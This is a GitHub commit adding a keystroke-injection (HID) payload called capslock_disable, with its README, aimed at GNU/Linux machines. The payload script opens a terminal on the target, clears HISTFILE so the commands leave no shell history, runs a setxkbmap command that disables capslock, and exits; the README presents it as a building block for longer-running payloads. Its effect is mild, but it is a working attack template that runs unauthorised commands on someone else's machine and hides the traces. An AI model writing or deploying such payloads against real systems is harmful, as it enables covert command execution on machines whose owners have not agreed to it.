upload CAPSLOCK_DISABLE payload

capslock_disable disables capslock on target’s system. Can be used as module to craft payloads which requires long time to execute.
pull/190/head
drapl0n 2023-07-09 19:52:54 +05:30 committed by GitHub
parent 146743ef64
commit 3e231ab9b8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,19 @@
## About
# Title: capslock_disable
# Description: capslock_disable disables capslock on target's system.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: GNU/Linux.
# Attackmodes: HID.
## capslock_disable: capslock_disable disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
### Workflow:
1. Executing Terminal Emulator.
2. Prevent storing history.
3. Executing command which disables capslock.
4. Terminating terminal instance.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,16 @@
REM Title: capslock_disable
REM Description: Disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Execution
REM Target: GNU/Linux.
REM Attackmodes: HID.
DELAY 1000
CTRL ALT t
DELAY 500
STRING unset HISTFILE
ENTER
DELAY 200
STRING setxkbmap -option ctrl:nocaps && exit
ENTER